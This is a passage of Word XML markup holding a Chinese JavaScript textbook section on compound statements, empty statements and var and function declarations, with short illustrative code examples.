        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>相反，得出了余弦值就得把它赋值给一个变量，以便将来才能使用这个值：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>cx=Math.cos(x);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>再次提醒读者，这些示例中的每行代码都是以分号</w:t>
      </w:r>
      <w:r>
        <w:t>结束的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="109" w:name="5_2_Fu_He_Yu_Ju_He_Kong_Yu_Ju_"/>
      <w:r>
        <w:t>5.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　复合语句和空语句</w:t>
      </w:r>
      <w:bookmarkEnd w:id="109"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>可以用逗号运算符（见</w:t>
      </w:r>
      <w:r>
        <w:t>4.13.5</w:t>
      </w:r>
      <w:r>
        <w:t>节）将几个表达式连接在一起，形成一个表达式，同样，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中还可以将多条语句联合在一起，形成一条复合语句（</w:t>
      </w:r>
      <w:r>
        <w:t>compound statement</w:t>
      </w:r>
      <w:r>
        <w:t>）。只须用花括号将多条语句括起来即可。因此，下面几行代码就可以当成一条单独的语句，使用在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中任何希望使用一条语句的地方：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>x=Math.PI;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>cx=Math.cos(x);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log("cos(π)="+cx);</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关于语句块有几点需要注意，第一</w:t>
      </w:r>
      <w:r>
        <w:t>，语句块的结尾不需要分号。块中的原始语句必须以分号结束，但语句块不需要。第二，语句块中的行都有缩进，这不是必需的，但整齐的缩进能让代码可读性更强，更容易理解。最后，需要注意，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中没有块级作用域，在语句块中声明的变量并不是语句块私有的（参照</w:t>
      </w:r>
      <w:r>
        <w:t>3.10.1</w:t>
      </w:r>
      <w:r>
        <w:t>节）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>将多条语句合并成一个大语句块的做法在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>编程中非常常见。类似表达式通常包含子表达式一样，很多</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>语句包含其他子语句。从形式上讲，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>语法通常允许一个语句块只包含一条子语句。例如，</w:t>
      </w:r>
      <w:r>
        <w:t>while</w:t>
      </w:r>
      <w:r>
        <w:t>循环的循环体就可以只包含一条语句。使用语句块，可以将任意数量的语句放到这个块中，这个语句块可以作为一条语句使用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中，当希望多条语句被当做一条语句使用时，使用复合语句来替代。空语句（</w:t>
      </w:r>
      <w:r>
        <w:t>empty statement</w:t>
      </w:r>
      <w:r>
        <w:t>）则恰好相反，它允许包含</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>条语句的语句。空语句如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pP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JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>解释器执行空语句时它显然不会执行任何动作。但实践证明，当创建一个具有空循环体的循环时，空语句有时是很有用的。例如下面的</w:t>
      </w:r>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:t>循环（</w:t>
      </w:r>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:t>循环详见</w:t>
      </w:r>
      <w:r>
        <w:t>5.5.3</w:t>
      </w:r>
      <w:r>
        <w:t>节）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>初始化一个数组</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>a.length;a[i++]=0);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>在这个循环中，所有的操作都在表达式</w:t>
      </w:r>
      <w:r>
        <w:t>a[i++]=0</w:t>
      </w:r>
      <w:r>
        <w:t>中完成，这里并不需要任何循环体。然而</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>需要循环体中至少包含一条语句，因此，这里只使用了一个单独的分号来表示一条空语句。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意，在</w:t>
      </w:r>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:t>循环、</w:t>
      </w:r>
      <w:r>
        <w:t>while</w:t>
      </w:r>
      <w:r>
        <w:t>循环或</w:t>
      </w:r>
      <w:r>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:t>语句的右圆括号后的分号很不起眼，这很可能造成一些致命</w:t>
      </w:r>
      <w:r>
        <w:t>bug</w:t>
      </w:r>
      <w:r>
        <w:t>，而这些</w:t>
      </w:r>
      <w:r>
        <w:t>bug</w:t>
      </w:r>
      <w:r>
        <w:t>很难定位到。例如，下面的代码的执行结果可能就不是程序作者想要的效果：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if((a==0)||(b==0));//</w:t>
      </w:r>
      <w:r>
        <w:t>糟糕</w:t>
      </w:r>
      <w:r>
        <w:t>!</w:t>
      </w:r>
      <w:r>
        <w:t>这一行代码什么都没做</w:t>
      </w:r>
      <w:r>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>o=null;//</w:t>
      </w:r>
      <w:r>
        <w:t>这一行代码总是会执行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果有特殊的目的需要使用空语句，最好在代码中添加注释，这样可以更清楚地说明这条空语句是有用的，例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>a.length;a[i++]=0)/*empty*/;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="110" w:name="5_3_Sheng_Ming_Yu_Ju_"/>
      <w:r>
        <w:t>5.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　声明语句</w:t>
      </w:r>
      <w:bookmarkEnd w:id="110"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>function</w:t>
      </w:r>
      <w:r>
        <w:t>都是声明语句，它们声明或定义变量或函数。这些语句定义标识符（变量名和函数名）并给其赋值，这些标识符可以在程序中任意地方使用。声明语句本身什么也不做，但它有一个重要的意义，通过创建变量和函数，可以更好地组织代码的语义。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>接下来的几节将会讲述</w:t>
      </w:r>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:t>语句和</w:t>
      </w:r>
      <w:r>
        <w:t>functuion</w:t>
      </w:r>
      <w:r>
        <w:t>语句，但并不包含变量和函数的全部内容，更多关于变量的内容请参照</w:t>
      </w:r>
      <w:r>
        <w:t>3.9</w:t>
      </w:r>
      <w:r>
        <w:t>节和</w:t>
      </w:r>
      <w:r>
        <w:t>3.10</w:t>
      </w:r>
      <w:r>
        <w:t>节。更多关于函数的内容请参照第</w:t>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>章。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="111" w:name="5_3_1_var"/>
      <w:r>
        <w:t>5.3.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:bookmarkEnd w:id="111"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:t>语句用来声明一个或者多个变量，它的语法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var name_1[=value_1][,...,name_n[=value_n]]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>关键字</w:t>
      </w:r>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:t>之后跟随的是要声明的变量列表，列表中的每一个变量都可以带有初始化表达式，用于指定它的初始值，例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var i;//</w:t>
      </w:r>
      <w:r>
        <w:t>一个简单的变量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var j=0;//</w:t>
      </w:r>
      <w:r>
        <w:t>一个带有初始值的变量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:r>
        <w:t>p,q;//</w:t>
      </w:r>
      <w:r>
        <w:t>两个变量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var greeting="hello"+name;//</w:t>
      </w:r>
      <w:r>
        <w:t>更复杂的初始化表达式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var x=2.34,y=Math.cos(0.75),r,theta;//</w:t>
      </w:r>
      <w:r>
        <w:t>很多变量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var x=2,y=x*x;//</w:t>
      </w:r>
      <w:r>
        <w:t>第二个变量使用了第一个变量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var x=2,//</w:t>
      </w:r>
      <w:r>
        <w:t>更多变量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>f=function(x){return x*x},//</w:t>
      </w:r>
      <w:r>
        <w:t>每一个变量都独占一行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>y=f(x);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:t>语句出现在函数体内，那么它定义的是一个局部变量，其作用域就是这个函数。如果在顶层代码中使用</w:t>
      </w:r>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:t>语句，它声明</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>的是全局变量，在整个</w:t>
      </w:r>
      <w:r>
        <w:t>J</w:t>
      </w:r>
      <w:r>
        <w:t>avaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序中都是可见的。正如在</w:t>
      </w:r>
      <w:r>
        <w:t>3.10.2</w:t>
      </w:r>
      <w:r>
        <w:t>节提到的，全局变量是全局对象的属性。然而和其他全局对象属性不同的是，</w:t>
      </w:r>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:t>声明的变量是无法通过</w:t>
      </w:r>
      <w:r>
        <w:t>delete</w:t>
      </w:r>
      <w:r>
        <w:t>删除的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:t>语句中的变量没有指定初始化表达式，那么这个变量的值初始为</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>3.10.1</w:t>
      </w:r>
      <w:r>
        <w:t>节已经提到，变量在声明它们的脚本或函数中都是有定义的，变量声明语句会被</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>提前</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>至脚本或者函数的顶部。但是初始化的操作则还在原来</w:t>
      </w:r>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:t>语句的位置执行，在声明语句之前变量的值是</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>需要注意的是，</w:t>
      </w:r>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:t>语句同样可以作为</w:t>
      </w:r>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:t>循环或者</w:t>
      </w:r>
      <w:r>
        <w:t>for/in</w:t>
      </w:r>
      <w:r>
        <w:t>循环的组成部分（和在循环之外声明的变量声明一样，这里声明的变量也会</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>提前</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>）。这里重复一下</w:t>
      </w:r>
      <w:r>
        <w:t>3.9</w:t>
      </w:r>
      <w:r>
        <w:t>节的例子：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>10;i++)console.log(i);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0,j=10;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>10;i++,j--)console.log(i*j);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i in o)console.log(i);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意，多次声明同一个变量是无所谓的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="112" w:name="5_3_2_function"/>
      <w:r>
        <w:t>5.3.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>function</w:t>
      </w:r>
      <w:bookmarkEnd w:id="112"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>关键字</w:t>
      </w:r>
      <w:r>
        <w:t>function</w:t>
      </w:r>
      <w:r>
        <w:t>用来定义函数。在</w:t>
      </w:r>
      <w:r>
        <w:t>4.3</w:t>
      </w:r>
      <w:r>
        <w:t>节中我们已经见过函数定义表达式。函数定义也可</w:t>
      </w:r>
      <w:r>
        <w:t>以写成语句的形式。例如，下面示例代码中的两种定义写法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var f=function(x){return x+1;}//</w:t>
      </w:r>
      <w:r>
        <w:t>将表达式赋值给一个变量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function f(x){return x+1;}//</w:t>
      </w:r>
      <w:r>
        <w:t>含有变量名的语句</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>函数声明语句的语法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function funcname([arg1[,arg2[...,argn]]]){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>statements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funcname</w:t>
      </w:r>
      <w:r>
        <w:t>是要声明的函数的名称的标识符。函数名之后的圆括号中是参数列表，参数之间使用逗号分隔。当调用函数时，这些标识符则指代传入函数的实参。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>函数体是由</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>语句组成的，语句的数量不限，且用花括号括起来。在定义函数时，并不执行函数体内的语句，它和调用函数时待执行的新函数对象相关联。注意，</w:t>
      </w:r>
      <w:r>
        <w:t>function</w:t>
      </w:r>
      <w:r>
        <w:t>语句里的花括号是必需的，这和</w:t>
      </w:r>
      <w:r>
        <w:t>while</w:t>
      </w:r>
      <w:r>
        <w:t>循环和其他一些语句所使用的语句块是不</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>同的，即使函数体只包含一条语句，仍然必须使用花括号将其括起来。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>下面是一些函数声明的例子：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function hypotenuse(x,y){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return Math.sqrt(x*x+y*y);//</w:t>
      </w:r>
      <w:r>
        <w:t>下一节会讲到</w:t>
      </w:r>
      <w:r>
        <w:t>return</w:t>
      </w:r>
    </w:p>
